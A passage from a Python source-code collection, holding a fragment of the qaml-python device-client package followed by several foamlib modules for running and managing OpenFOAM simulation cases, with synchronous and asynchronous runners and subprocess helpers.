client = AndroidClient(api_key, driver=driver)
client.use_accessibility_elements = use_accessibility_elements
return client
elif platform_name == 'ios':
print("Using the provided Appium driver for iOS.")
client = IOSClient(api_key, driver=driver)
client.use_accessibility_elements = use_accessibility_elements
client.use_hid_typing = use_hid_typing
return client
else:
raise Exception("Unsupported platform specified in the provided driver's capabilities.")
android_devices = get_connected_android_devices()
if android_devices:
client = AndroidClient(api_key)
client.use_accessibility_elements = use_accessibility_elements
return client
try:
client = IOSClient(api_key, use_mjpeg=use_mjpeg, udid=udid)
client.use_accessibility_elements = use_accessibility_elements
client.use_hid_typing = use_hid_typing
return client
except:
raise Exception("No connected devices found or driver provided.")
| 16,834 | Python | .py | 335 | 39.256716 | 294 | 0.600389 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,132 | __main__.py | qaml-ai_qaml-python/qaml/__main__.py | import qaml
import sys
import os
import readline
def main():
# get api key from environment variable
api_key = os.environ.get("QAML_API_KEY")
use_mjpeg = os.environ.get("QAML_USE_MJPEG", "true").lower() == "true"
if api_key is None:
print("Please set the QAML_API_KEY environment variable")
sys.exit(1)
print("Initializing device driver...")
client = qaml.Client(api_key=api_key, use_mjpeg=use_mjpeg)
# if no args, start repl
if len(sys.argv) == 1:
while True:
try:
command = input("Enter a command: ")
client.execute(command)
except EOFError:
print("")
break
except Exception as e:
print(f"Error: {e}")
else:
args_str = " ".join(sys.argv[1:])
print(f"Running command: {args_str}")
client.execute(args_str)
if __name__ == "__main__":
main()
| 948 | Python | .py | 30 | 23.7 | 74 | 0.567213 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,133 | cli_agent.py | qaml-ai_qaml-python/qaml/cli_agent.py | import qaml
import sys
import os
import readline
def main():
# get api key from environment variable
api_key = os.environ.get("QAML_API_KEY")
use_mjpeg = os.environ.get("QAML_USE_MJPEG", "true").lower() == "true"
if api_key is None:
print("Please set the QAML_API_KEY environment variable")
sys.exit(1)
print("Initializing device driver...")
client = qaml.Client(api_key=api_key, use_mjpeg=use_mjpeg)
# if no args, start repl
if len(sys.argv) == 1:
while True:
try:
task = input("Enter a task: ")
for action in client.task(task):
print(action)
except EOFError:
print("")
break
except Exception as e:
print(f"Error: {e}")
else:
args_str = " ".join(sys.argv[1:])
print(f"Running task: {args_str}")
for action in client.task(args_str):
print(action)
| 981 | Python | .py | 30 | 23.9 | 74 | 0.559536 | qaml-ai/qaml-python | 8 | 0 | 1 | AGPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,134 | conf.py | gerlero_foamlib/docs/conf.py | # Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
project = "foamlib"
copyright = "2024, Gabriel S. Gerlero"
author = "Gabriel S. Gerlero"
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = ["sphinx.ext.autodoc"]
templates_path = ["_templates"]
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = "sphinx_rtd_theme"
html_static_path = ["_static"]
| 981 | Python | .py | 18 | 53.055556 | 87 | 0.643979 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,135 | __init__.py | gerlero_foamlib/foamlib/__init__.py | """A Python interface for interacting with OpenFOAM."""
__version__ = "0.6.10"
from ._cases import (
AsyncFoamCase,
AsyncSlurmFoamCase,
CalledProcessError,
FoamCase,
FoamCaseBase,
FoamCaseRunBase,
)
from ._files import FoamFieldFile, FoamFile, FoamFileBase
__all__ = [
"AsyncFoamCase",
"AsyncSlurmFoamCase",
"CalledProcessError",
"FoamFile",
"FoamCase",
"FoamCaseBase",
"FoamCaseRunBase",
"FoamFieldFile",
"FoamFileBase",
]
| 487 | Python | .py | 22 | 18.272727 | 57 | 0.692641 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,136 | _subprocess.py | gerlero_foamlib/foamlib/_cases/_subprocess.py | import asyncio
import subprocess
import sys
from io import BytesIO
from typing import IO, TYPE_CHECKING, Optional, Union
if TYPE_CHECKING:
import os
if sys.version_info >= (3, 9):
from collections.abc import Mapping, Sequence
else:
from typing import Mapping, Sequence
CompletedProcess = subprocess.CompletedProcess
class CalledProcessError(subprocess.CalledProcessError):
def __str__(self) -> str:
if self.stderr:
if isinstance(self.stderr, bytes):
return super().__str__() + "\n" + self.stderr.decode()
if isinstance(self.stderr, str):
return super().__str__() + "\n" + self.stderr
return super().__str__()
DEVNULL = subprocess.DEVNULL
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
def run_sync(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
check: bool = True,
cwd: Optional["os.PathLike[str]"] = None,
env: Optional[Mapping[str, str]] = None,
stdout: Optional[Union[int, IO[bytes]]] = None,
stderr: Optional[Union[int, IO[bytes]]] = None,
) -> "CompletedProcess[bytes]":
if not isinstance(cmd, str) and sys.version_info < (3, 8):
cmd = [str(arg) for arg in cmd]
proc = subprocess.Popen(
cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
shell=isinstance(cmd, str),
)
if stderr == STDOUT:
stderr = stdout
if stderr not in (PIPE, DEVNULL):
stderr_copy = BytesIO()
assert not isinstance(stderr, int)
if stderr is None:
stderr = sys.stderr.buffer
assert proc.stderr is not None
for line in proc.stderr:
stderr.write(line)
stderr_copy.write(line)
output, _ = proc.communicate()
assert not _
error = stderr_copy.getvalue()
else:
output, error = proc.communicate()
assert proc.returncode is not None
if check and proc.returncode != 0:
raise CalledProcessError(
returncode=proc.returncode,
cmd=cmd,
output=output,
stderr=error,
)
return CompletedProcess(
cmd, returncode=proc.returncode, stdout=output, stderr=error
)
async def run_async(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
check: bool = True,
cwd: Optional["os.PathLike[str]"] = None,
env: Optional[Mapping[str, str]] = None,
stdout: Optional[Union[int, IO[bytes]]] = None,
stderr: Optional[Union[int, IO[bytes]]] = None,
) -> "CompletedProcess[bytes]":
if isinstance(cmd, str):
proc = await asyncio.create_subprocess_shell(
cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
)
else:
if sys.version_info < (3, 8):
cmd = [str(arg) for arg in cmd]
proc = await asyncio.create_subprocess_exec(
*cmd,
cwd=cwd,
env=env,
stdout=stdout,
stderr=PIPE,
)
if stderr == STDOUT:
stderr = stdout
if stderr not in (PIPE, DEVNULL):
stderr_copy = BytesIO()
assert not isinstance(stderr, int)
if stderr is None:
stderr = sys.stderr.buffer
assert proc.stderr is not None
async for line in proc.stderr:
stderr.write(line)
stderr_copy.write(line)
output, _ = await proc.communicate()
assert not _
error = stderr_copy.getvalue()
else:
output, error = await proc.communicate()
assert proc.returncode is not None
if check and proc.returncode != 0:
raise CalledProcessError(
returncode=proc.returncode,
cmd=cmd,
output=output,
stderr=error,
)
return CompletedProcess(
cmd, returncode=proc.returncode, stdout=output, stderr=error
)
| 3,952 | Python | .py | 123 | 24.211382 | 70 | 0.599947 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,137 | _run.py | gerlero_foamlib/foamlib/_cases/_run.py | import os
import shlex
import shutil
import sys
import tempfile
from abc import abstractmethod
from contextlib import contextmanager
from pathlib import Path
from typing import (
IO,
Any,
Optional,
Tuple,
Union,
)
if sys.version_info >= (3, 9):
from collections.abc import (
Callable,
Collection,
Coroutine,
Generator,
Mapping,
Sequence,
Set,
)
else:
from typing import AbstractSet as Set
from typing import (
Callable,
Collection,
Coroutine,
Generator,
Mapping,
Sequence,
)
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._subprocess import DEVNULL, STDOUT
class FoamCaseRunBase(FoamCaseBase):
class TimeDirectory(FoamCaseBase.TimeDirectory):
@abstractmethod
def cell_centers(
self,
) -> Union[FoamFieldFile, Coroutine[None, None, FoamFieldFile]]:
raise NotImplementedError
@property
@abstractmethod
def _case(self) -> "FoamCaseRunBase":
raise NotImplementedError
def _cell_centers_calls(self) -> Generator[Any, None, FoamFieldFile]:
ret = self["C"]
if ret not in self:
yield self._case.run(
["postProcess", "-func", "writeCellCentres", "-time", self.name],
cpus=0,
log=False,
)
return ret
def __delitem__(self, key: Union[int, float, str]) -> None:
shutil.rmtree(self[key].path)
@staticmethod
@abstractmethod
def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@staticmethod
@abstractmethod
def _rmtree(
path: Union["os.PathLike[str]", str], *, ignore_errors: bool = False
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@staticmethod
@abstractmethod
def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def clean(self, *, check: bool = False) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def copy(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Any:
raise NotImplementedError
@abstractmethod
def clone(self, dst: Optional[Union["os.PathLike[str]", str]] = None) -> Any:
raise NotImplementedError
@abstractmethod
def _prepare(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def block_mesh(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def decompose_par(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def reconstruct_par(
self, *, check: bool = True, log: bool = True
) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
@abstractmethod
def restore_0_dir(self) -> Union[None, Coroutine[None, None, None]]:
raise NotImplementedError
def __clean_paths(self) -> Set[Path]:
has_decompose_par_dict = (self.path / "system" / "decomposeParDict").is_file()
has_block_mesh_dict = (self.path / "system" / "blockMeshDict").is_file()
paths = set()
for p in self.path.iterdir():
if p.is_dir():
try:
t = float(p.name)
except ValueError:
pass
else:
if t != 0:
paths.add(p)
if has_decompose_par_dict and p.name.startswith("processor"):
paths.add(p)
if (self.path / "0.orig").is_dir() and (self.path / "0").is_dir():
paths.add(self.path / "0")
if has_block_mesh_dict and (self.path / "constant" / "polyMesh").exists():
paths.add(self.path / "constant" / "polyMesh")
paths.update(self.path.glob("log.*"))
return paths
def __clone_ignore(
self,
) -> Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]:
clean_paths = self.__clean_paths()
def ignore(
path: Union["os.PathLike[str]", str], names: Collection[str]
) -> Collection[str]:
paths = {Path(path) / name for name in names}
return {p.name for p in paths.intersection(clean_paths)}
return ignore
def __clean_script(self) -> Optional[Path]:
"""Return the path to the (All)clean script, or None if no clean script is found."""
clean = self.path / "clean"
all_clean = self.path / "Allclean"
if clean.is_file():
script = clean
elif all_clean.is_file():
script = all_clean
else:
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __prepare_script(self) -> Optional[Path]:
"""Return the path to the Allrun.pre script, or None if no prepare script is found."""
script = self.path / "Allrun.pre"
if not script.is_file():
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __run_script(self, *, parallel: Optional[bool]) -> Optional[Path]:
"""Return the path to the (All)run script, or None if no run script is found."""
run = self.path / "run"
run_parallel = self.path / "run-parallel"
all_run = self.path / "Allrun"
all_run_parallel = self.path / "Allrun-parallel"
if run.is_file() or all_run.is_file():
if run_parallel.is_file() or all_run_parallel.is_file():
if parallel:
script = (
run_parallel if run_parallel.is_file() else all_run_parallel
)
elif parallel is False:
script = run if run.is_file() else all_run
else:
raise ValueError(
"Both (All)run and (All)run-parallel scripts are present. Please specify parallel argument."
)
else:
script = run if run.is_file() else all_run
elif parallel is not False and (
run_parallel.is_file() or all_run_parallel.is_file()
):
script = run_parallel if run_parallel.is_file() else all_run_parallel
else:
return None
if sys.argv and Path(sys.argv[0]).absolute() == script.absolute():
return None
return script
def __env(self, *, shell: bool) -> Optional[Mapping[str, str]]:
sip_workaround = os.environ.get(
"FOAM_LD_LIBRARY_PATH", ""
) and not os.environ.get("DYLD_LIBRARY_PATH", "")
if not shell or sip_workaround:
env = os.environ.copy()
if not shell:
env["PWD"] = str(self.path)
if sip_workaround:
env["DYLD_LIBRARY_PATH"] = env["FOAM_LD_LIBRARY_PATH"]
return env
return None
@contextmanager
def __output(
self, cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str], *, log: bool
) -> Generator[Tuple[Union[int, IO[bytes]], Union[int, IO[bytes]]], None, None]:
if log:
if isinstance(cmd, str):
name = shlex.split(cmd)[0]
else:
name = Path(cmd[0]).name if isinstance(cmd[0], os.PathLike) else cmd[0]
with (self.path / f"log.{name}").open("ab") as stdout:
yield stdout, STDOUT
else:
yield DEVNULL, DEVNULL
def __mkrundir(self) -> Path:
d = Path(os.environ["FOAM_RUN"], "foamlib")
d.mkdir(parents=True, exist_ok=True)
ret = Path(tempfile.mkdtemp(prefix=f"{self.name}-", dir=d))
ret.rmdir()
return ret
def _copy_calls(
self, dst: Optional[Union["os.PathLike[str]", str]]
) -> Generator[Any, None, Self]:
if dst is None:
dst = self.__mkrundir()
yield self._copytree(self.path, dst, symlinks=True)
return type(self)(dst)
def _clean_calls(self, *, check: bool) -> Generator[Any, None, None]:
script_path = self.__clean_script()
if script_path is not None:
yield self.run([script_path], cpus=0, check=check, log=False)
else:
for p in self.__clean_paths():
if p.is_dir():
yield self._rmtree(p)
else:
p.unlink()
def _clone_calls(
self, dst: Optional[Union["os.PathLike[str]", str]]
) -> Generator[Any, None, Self]:
if dst is None:
dst = self.__mkrundir()
if self.__clean_script() is not None:
yield self.copy(dst)
yield type(self)(dst).clean()
else:
yield self._copytree(
self.path, dst, symlinks=True, ignore=self.__clone_ignore()
)
return type(self)(dst)
def _restore_0_dir_calls(self) -> Generator[Any, None, None]:
yield self._rmtree(self.path / "0", ignore_errors=True)
yield self._copytree(self.path / "0.orig", self.path / "0", symlinks=True)
def _block_mesh_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["blockMesh"], cpus=0, check=check, log=log)
def _decompose_par_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["decomposePar"], cpus=0, check=check, log=log)
def _reconstruct_par_calls(
self, *, check: bool, log: bool
) -> Generator[Any, None, None]:
yield self.run(["reconstructPar"], cpus=0, check=check, log=log)
def _prepare_calls(self, *, check: bool, log: bool) -> Generator[Any, None, None]:
script_path = self.__prepare_script()
if script_path is not None:
yield self.run([script_path], log=log, check=check)
elif (self.path / "system" / "blockMeshDict").is_file():
yield self.block_mesh(check=check, log=log)
def _run_calls(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool],
cpus: Optional[int],
check: bool,
log: bool,
**kwargs: Any,
) -> Generator[Any, None, None]:
if cmd is not None:
if parallel:
if cpus is None:
cpus = max(self._nprocessors, 1)
else:
parallel = False
if cpus is None:
cpus = 1
with self.__output(cmd, log=log) as (stdout, stderr):
if parallel:
if isinstance(cmd, str):
cmd = [
"mpiexec",
"-n",
str(cpus),
"/bin/sh",
"-c",
f"{cmd} -parallel",
]
else:
cmd = ["mpiexec", "-n", str(cpus), *cmd, "-parallel"]
yield self._run(
cmd,
cpus=cpus,
check=check,
cwd=self.path,
env=self.__env(shell=isinstance(cmd, str)),
stdout=stdout,
stderr=stderr,
**kwargs,
)
else:
script_path = self.__run_script(parallel=parallel)
if script_path is not None:
if parallel or parallel is None:
if cpus is None:
if self._nprocessors > 0:
cpus = self._nprocessors
elif (self.path / "system" / "decomposeParDict").is_file():
cpus = self._nsubdomains
else:
cpus = 1
else:
if cpus is None:
cpus = 1
yield self.run(
[script_path], parallel=False, cpus=cpus, check=check, **kwargs
)
else:
yield self._prepare(check=check, log=log)
if not self and (self.path / "0.orig").is_dir():
yield self.restore_0_dir()
if parallel is None:
parallel = (
(cpus is not None and cpus > 1)
or self._nprocessors > 0
or (self.path / "system" / "decomposeParDict").is_file()
)
if parallel:
if (
self._nprocessors == 0
and (self.path / "system" / "decomposeParDict").is_file()
):
yield self.decompose_par(check=check)
if cpus is None:
cpus = max(self._nprocessors, 1)
else:
if cpus is None:
cpus = 1
yield self.run(
[self.application],
parallel=parallel,
cpus=cpus,
check=check,
**kwargs,
)
| 14,725 | Python | .py | 383 | 26.637076 | 116 | 0.525172 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,138 | _util.py | gerlero_foamlib/foamlib/_cases/_util.py | import functools
import sys
from types import TracebackType
from typing import (
Any,
AsyncContextManager,
Callable,
Generic,
Optional,
Type,
TypeVar,
)
if sys.version_info >= (3, 9):
from collections.abc import Generator
else:
from typing import Generator
Y = TypeVar("Y")
S = TypeVar("S")
R = TypeVar("R")
class ValuedGenerator(Generic[Y, S, R]):
def __init__(self, generator: Generator[Y, S, R]):
self._generator = generator
def __iter__(self) -> Generator[Y, S, R]:
self.value = yield from self._generator
return self.value
class _AwaitableAsyncContextManager(Generic[R]):
def __init__(self, cm: "AsyncContextManager[R]"):
self._cm = cm
def __await__(self) -> Generator[Any, Any, R]:
return self._cm.__aenter__().__await__()
async def __aenter__(self) -> R:
return await self._cm.__aenter__()
async def __aexit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> Optional[bool]:
return await self._cm.__aexit__(exc_type, exc_val, exc_tb)
def awaitableasynccontextmanager(
cm: Callable[..., "AsyncContextManager[R]"],
) -> Callable[..., _AwaitableAsyncContextManager[R]]:
@functools.wraps(cm)
def f(*args: Any, **kwargs: Any) -> _AwaitableAsyncContextManager[R]:
return _AwaitableAsyncContextManager(cm(*args, **kwargs))
return f
| 1,493 | Python | .py | 46 | 27.326087 | 73 | 0.64829 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,139 | __init__.py | gerlero_foamlib/foamlib/_cases/__init__.py | from ._async import AsyncFoamCase
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._slurm import AsyncSlurmFoamCase
from ._subprocess import CalledProcessError
from ._sync import FoamCase
__all__ = [
"AsyncFoamCase",
"FoamCaseBase",
"FoamCaseRunBase",
"AsyncSlurmFoamCase",
"CalledProcessError",
"FoamCase",
]
| 358 | Python | .py | 14 | 22.785714 | 43 | 0.763848 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,140 | _async.py | gerlero_foamlib/foamlib/_cases/_async.py | import asyncio
import multiprocessing
import sys
from contextlib import asynccontextmanager
from typing import TYPE_CHECKING, Any, Callable, Optional, TypeVar, Union, overload
if sys.version_info >= (3, 9):
from collections.abc import (
AsyncGenerator,
Awaitable,
Collection,
Iterable,
Sequence,
)
else:
from typing import AsyncGenerator, Awaitable, Collection, Iterable, Sequence
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
import aioshutil
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._subprocess import run_async
from ._util import ValuedGenerator, awaitableasynccontextmanager
if TYPE_CHECKING:
import os
X = TypeVar("X")
Y = TypeVar("Y")
class AsyncFoamCase(FoamCaseRunBase):
"""
An OpenFOAM case with asynchronous support.
Provides methods for running and cleaning cases, as well as accessing files.
Access the time directories of the case as a sequence, e.g. `case[0]` or `case[-1]`.
:param path: The path to the case directory.
"""
class TimeDirectory(FoamCaseRunBase.TimeDirectory):
@property
def _case(self) -> "AsyncFoamCase":
return AsyncFoamCase(self.path.parent)
async def cell_centers(self) -> FoamFieldFile:
"""Write and return the cell centers."""
calls = ValuedGenerator(self._cell_centers_calls())
for coro in calls:
await coro
return calls.value
max_cpus = multiprocessing.cpu_count()
"""
Maximum number of CPUs to use for running instances of `AsyncFoamCase` concurrently.
Defaults to the number of CPUs on the system.
"""
_reserved_cpus = 0
_cpus_cond = asyncio.Condition()
@staticmethod
@asynccontextmanager
async def _cpus(cpus: int) -> AsyncGenerator[None, None]:
cpus = min(cpus, AsyncFoamCase.max_cpus)
if cpus > 0:
async with AsyncFoamCase._cpus_cond:
await AsyncFoamCase._cpus_cond.wait_for(
lambda: AsyncFoamCase.max_cpus - AsyncFoamCase._reserved_cpus
>= cpus
)
AsyncFoamCase._reserved_cpus += cpus
try:
yield
finally:
if cpus > 0:
async with AsyncFoamCase._cpus_cond:
AsyncFoamCase._reserved_cpus -= cpus
AsyncFoamCase._cpus_cond.notify(cpus)
@staticmethod
async def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> None:
async with AsyncFoamCase._cpus(cpus):
await run_async(cmd, **kwargs)
@staticmethod
async def _rmtree(
path: Union["os.PathLike[str]", str], ignore_errors: bool = False
) -> None:
await aioshutil.rmtree(path, ignore_errors=ignore_errors)
@staticmethod
async def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> None:
await aioshutil.copytree(src, dest, symlinks=symlinks, ignore=ignore)
async def clean(self, *, check: bool = False) -> None:
"""
Clean this case.
:param check: If True, raise a CalledProcessError if the clean script returns a non-zero exit code.
"""
for coro in self._clean_calls(check=check):
await coro
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "AsyncFoamCase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["AsyncFoamCase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["AsyncFoamCase.TimeDirectory", Sequence["AsyncFoamCase.TimeDirectory"]]:
ret = super().__getitem__(index)
if isinstance(ret, FoamCaseBase.TimeDirectory):
return AsyncFoamCase.TimeDirectory(ret)
return [AsyncFoamCase.TimeDirectory(r) for r in ret]
async def _prepare(self, *, check: bool = True, log: bool = True) -> None:
for coro in self._prepare_calls(check=check, log=log):
await coro
async def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
"""
for coro in self._run_calls(
cmd=cmd, parallel=parallel, cpus=cpus, check=check, log=log
):
await coro
async def block_mesh(self, *, check: bool = True, log: bool = True) -> None:
"""Run blockMesh on this case."""
for coro in self._block_mesh_calls(check=check, log=log):
await coro
async def decompose_par(self, *, check: bool = True, log: bool = True) -> None:
"""Decompose this case for parallel running."""
for coro in self._decompose_par_calls(check=check, log=log):
await coro
async def reconstruct_par(self, *, check: bool = True, log: bool = True) -> None:
"""Reconstruct this case after parallel running."""
for coro in self._reconstruct_par_calls(check=check, log=log):
await coro
async def restore_0_dir(self) -> None:
"""Restore the 0 directory from the 0.orig directory."""
for coro in self._restore_0_dir_calls():
await coro
@awaitableasynccontextmanager
@asynccontextmanager
async def copy(
self, dst: Optional[Union["os.PathLike[str]", str]] = None
) -> AsyncGenerator[Self, None]:
"""
Make a copy of this case.
Use as an async context manager to automatically delete the copy when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._copy_calls(dst))
for coro in calls:
await coro
yield calls.value
await self._rmtree(calls.value.path)
@awaitableasynccontextmanager
@asynccontextmanager
async def clone(
self, dst: Optional[Union["os.PathLike[str]", str]] = None
) -> AsyncGenerator[Self, None]:
"""
Clone this case (make a clean copy).
Use as an async context manager to automatically delete the clone when done.
:param dst: The destination path. If None, clone to `$FOAM_RUN/foamlib`.
"""
calls = ValuedGenerator(self._clone_calls(dst))
for coro in calls:
await coro
yield calls.value
await self._rmtree(calls.value.path)
@staticmethod
def map(coro: Callable[[X], Awaitable[Y]], iterable: Iterable[X]) -> Iterable[Y]:
"""Run an async function on each element of an iterable concurrently."""
return asyncio.get_event_loop().run_until_complete(
asyncio.gather(*(coro(arg) for arg in iterable))
)
| 7,920 | Python | .py | 192 | 33.041667 | 181 | 0.632148 | gerlero/foamlib | 8 | 2 | 0 | GPL-3.0 | 9/5/2024, 10:48:26 PM (Europe/Amsterdam) |
2,288,141 | _sync.py | gerlero_foamlib/foamlib/_cases/_sync.py | import shutil
import sys
from types import TracebackType
from typing import TYPE_CHECKING, Any, Callable, Optional, Type, Union, overload
if sys.version_info >= (3, 9):
from collections.abc import Collection, Sequence
else:
from typing import Collection, Sequence
if sys.version_info >= (3, 11):
from typing import Self
else:
from typing_extensions import Self
from .._files import FoamFieldFile
from ._base import FoamCaseBase
from ._run import FoamCaseRunBase
from ._subprocess import run_sync
from ._util import ValuedGenerator
if TYPE_CHECKING:
import os
class FoamCase(FoamCaseRunBase):
"""
An OpenFOAM case.
Provides methods for running and cleaning cases, as well as accessing files.
Access the time directories of the case as a sequence, e.g. `case[0]` or `case[-1]`.
:param path: The path to the case directory.
"""
class TimeDirectory(FoamCaseRunBase.TimeDirectory):
@property
def _case(self) -> "FoamCase":
return FoamCase(self.path.parent)
def cell_centers(self) -> FoamFieldFile:
"""Write and return the cell centers."""
calls = ValuedGenerator(self._cell_centers_calls())
for _ in calls:
pass
return calls.value
@staticmethod
def _run(
cmd: Union[Sequence[Union[str, "os.PathLike[str]"]], str],
*,
cpus: int,
**kwargs: Any,
) -> None:
run_sync(cmd, **kwargs)
@staticmethod
def _rmtree(
path: Union["os.PathLike[str]", str], *, ignore_errors: bool = False
) -> None:
shutil.rmtree(path, ignore_errors=ignore_errors)
@staticmethod
def _copytree(
src: Union["os.PathLike[str]", str],
dest: Union["os.PathLike[str]", str],
*,
symlinks: bool = False,
ignore: Optional[
Callable[[Union["os.PathLike[str]", str], Collection[str]], Collection[str]]
] = None,
) -> None:
shutil.copytree(src, dest, symlinks=symlinks, ignore=ignore)
@overload
def __getitem__(
self, index: Union[int, float, str]
) -> "FoamCase.TimeDirectory": ...
@overload
def __getitem__(self, index: slice) -> Sequence["FoamCase.TimeDirectory"]: ...
def __getitem__(
self, index: Union[int, slice, float, str]
) -> Union["FoamCase.TimeDirectory", Sequence["FoamCase.TimeDirectory"]]:
ret = super().__getitem__(index)
if isinstance(ret, FoamCaseBase.TimeDirectory):
return FoamCase.TimeDirectory(ret)
return [FoamCase.TimeDirectory(r) for r in ret]
def __enter__(self) -> Self:
return self
def __exit__(
self,
exc_type: Optional[Type[BaseException]],
exc_val: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
self._rmtree(self.path)
def clean(self, *, check: bool = False) -> None:
"""
Clean this case.
:param check: If True, raise a CalledProcessError if the clean script returns a non-zero exit code.
"""
for _ in self._clean_calls(check=check):
pass
def _prepare(self, *, check: bool = True, log: bool = True) -> None:
for _ in self._prepare_calls(check=check, log=log):
pass
def run(
self,
cmd: Optional[Union[Sequence[Union[str, "os.PathLike[str]"]], str]] = None,
*,
parallel: Optional[bool] = None,
cpus: Optional[int] = None,
check: bool = True,
log: bool = True,
) -> None:
"""
Run this case, or a specified command in the context of this case.
:param cmd: The command to run. If None, run the case. If a sequence, the first element is the command and the rest are arguments. If a string, `cmd` is executed in a shell.
:param parallel: If True, run in parallel using MPI. If None, autodetect whether to run in parallel.
:param cpus: The number of CPUs to use. If None, autodetect according to the case.
:param check: If True, raise a CalledProcessError if any command returns a non-zero exit code.
:param log: If True, log the command output to a file.
"""
for _ in self._run_calls(
cmd=cmd, parallel=parallel, cpus=cpus, check=check, log=log
):
pass
def block_mesh(self, *, check: bool = True, log: bool = True) -> None:
"""Run blockMesh on this case."""
for _ in self._block_mesh_calls(check=check, log=log):
pass
def decompose_par(self, *, check: bool = True, log: bool = True) -> None:
"""Decompose this case for parallel running."""
for _ in self._decompose_par_calls(check=check, log=log):
pass
def reconstruct_par(self, *, check: bool = True, log: bool = True) -> None:
"""Reconstruct this case after parallel running."""
for _ in self._reconstruct_par_calls(check=check, log=log):
pass
def restore_0_dir(self) -> None:
"""Restore the 0 directory from the 0.orig directory."""
for _ in self._restore_0_dir_calls():
